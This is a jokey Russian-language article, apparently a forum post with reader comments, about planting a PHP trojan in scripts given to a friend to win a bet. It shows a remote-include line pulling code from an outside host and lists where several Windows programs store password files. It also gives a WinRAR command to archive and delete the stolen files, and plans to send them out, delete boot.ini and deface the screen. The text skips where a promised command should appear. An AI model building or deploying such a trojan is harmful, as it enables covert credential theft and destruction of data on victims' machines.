Я начну эту статью, также как и начинаються все безперспективные статьи. Однажды дома, пив с другом пиво и лапав баб, мы с ним поспорили что комп друга никак нельзя взломать. (ХЗ, но всегда почему-то после бычки тянет на взлом, гы лол). Так как компьютер моему корешу купили неделю назад, он уже спокойно мне объяснял разницу между RFC 2616 и RFC-822? рассказывал про технологию web 2.0. Упс, забыл перелистнуть страницу своего дневника. Итак. Под предлогом того, что пиво имеет свойство не останавливаться в теле человека, я подполз к компу своего другана. Первый осмотр показал что комп можно взломать. т.к. системная крышка не была прикручена. Ладно, осматриваем дальше. О-пля, я нахожу мышь, клаву, монитор и системный блок. Осматриваю экран монитора, кроме Windows на рабочем столе вижу еще парочку интересных на мой взгляд программ. Блокнот, Сапер, Косынка, Counter-strike, StripGirl, Quake и т.д... Ну вообщем типичный набор сисадмина. Перевожу взгляд вниз и направо. Вижу : Nod32, Outpost firewall 4, KAV Antihacker. Точно чувак что-то админит, отметил киборг, и побежал допивать свое пиво. Итак поспорив (это все пиво гадина) с другом что я его взломаю на 20 литров пива, стащив у него остатки пива я отправился домой. Допил пиво, разделся, лег в кровать, почуствовал что рядом лежит какая то девушка, спихнул её , оделся, заснул. Проснувшись утром на полу, потому что деваха все таки поднялась и спихнула меня, я начал думать(подумали про взлом? нихрена, я подумал про похмелье.) Ладно опустим прелюдию. Сев за комп, стал думать как же взломать этого кекса ,т.к. 20 литров пива у компьютерщиков быть не может. Пришла совершенно тупая идея полазить в поисковике. Среди результатов поиска нашол сцылку на его профиль на phpclub.ru. Мда, интересно, что там делает это чудак. Оказалось, что он там спрашивал какие-то скрипты регистрации. (причом тема была совсем свежая). И тут, меня словно током бьет(розетка задымилась). А ведь можно написать php троян и подсунуть этому чуваку вместе со его скриптами. Как я себе это представлял: 1) Троян находиться на серваке, а в скриптах просто напросто инклудиться @include "http://lol.ru/troi.txt"; Можно конечно и поэксперементировать с шифрованием, но это все замашки бюрократов. Мне это не нужно было. 2) Троян собирает пароли и отсылает мне их на мыло или на фтп. Потом я решил, что лучше пусть собирает файлы с паролями а декодировать ну его нах, лишний вес и т.д. 3) Быть незаметным и не палиться, и не грузить систему. 4) Удалить boot.ini и вывести в окно надпись "Hacked by k1b0rg"; Итак, сначала я должен был знать, с какими программами мне придеться работать. 1) MuxaSoftDialer я когда то ему ее довал. 2) R&Q - узнал в своем icq клиенте. 3) Total Commander - узнал просто спросив, чем он заливает файлы на сервак. 4) The Bat! Узнал из заголовка его письма присланного мне.(он не любит web интерфейс). Итак поочередно и будем рассматривать каждую программу. MuxaSoftDialer. Пароли храняться в файле C:\Program Files\MuxaSoft Dialer\Profiles\(имя пользователя).mdp Тут немного подумав я решил подставить текущего юзера. Узнав его через $_ENV['USERNAME']; R&Q версии 1030. По дефолту он устанавливаеться в путь C:\Program Files\R&Q Пароли храняться в файлах C:\Program Files\R&Q\(номер icq)\andrq.ini Итак сначала мы просканим C:\Program Files\R&Q на наличие циферных папок (номерков асек чела ,вдруг у него не один номер?). А потом у каждого номера вытащим пассы. Total Commander. По дефолту файл с паролями находиться в C:\WINDOWS\wcx_ftp.ini Лично я это файл не парсил а прям так пихнул. Но можете и пропарсить его функцией parse_ini_file() The Bat! Он хранит свои пароли C:\Documents and Settings\(юзер)\Application Data\The Bat!\(почта)\Account.CFN В php нету функцией для работы с реестром, а но и нах не надо, у нас же есть функция system(); покажет путь где расположен тотал командер. вот терь у нас есть функция для работы с реестром. Такс, терь у нас появились файлы, надо бы их соединить в один и сжать, как быть? можно написать целый класс сжатия на php но имхо это беспонтово, долго, и много кода. Возьмем то что почти у всех стоит. Winrar. Консольная команда сжатия: winrar.exe a log troi* -ibck -df a добавляет архив log имя архива плюс *.rar troi* все файлы которые начинаються на troi -ibck запустить в фоновом режиме, чтобы не появлялось окно статуса сжатия файла. -df удалить файлы после архивации итак команда для архивировании наших файлов будет
ну да, работа с файлами на пхп, это обыденно. Закончилось тем что у чувака полетела разметка жесткого диска с какого-то хрена, после загрузки специального батника. Но пиво я все таки попил. Правда винт пришлось мне востанавливать.
2[loy] Ну если писать полиформный, саморазмножающийся вирус, который будет заражать linux,dos,win 3.1,win32,win64,FreeBSD, твою не работающюю моторолу, пылесос, холодильник, телефоны порно звезд и старую заводную крысу, тогда да. А так, под конкретный случай, пропуская чере обфускатор. можно сжать до 2 кб.
Тама ты что то написал много очень лишнего в лжи нет я подумал а сам ведь скока пхп весит если будет заражть обычный комп там тем более небудит пхп так что и пхп нужен та win32,win64 -- шот это интересно
Нифига, статья катик на зачет, чем вам неугодило??? на пхп само то... п.с. это вам не сплоенты писать на шхтмл...
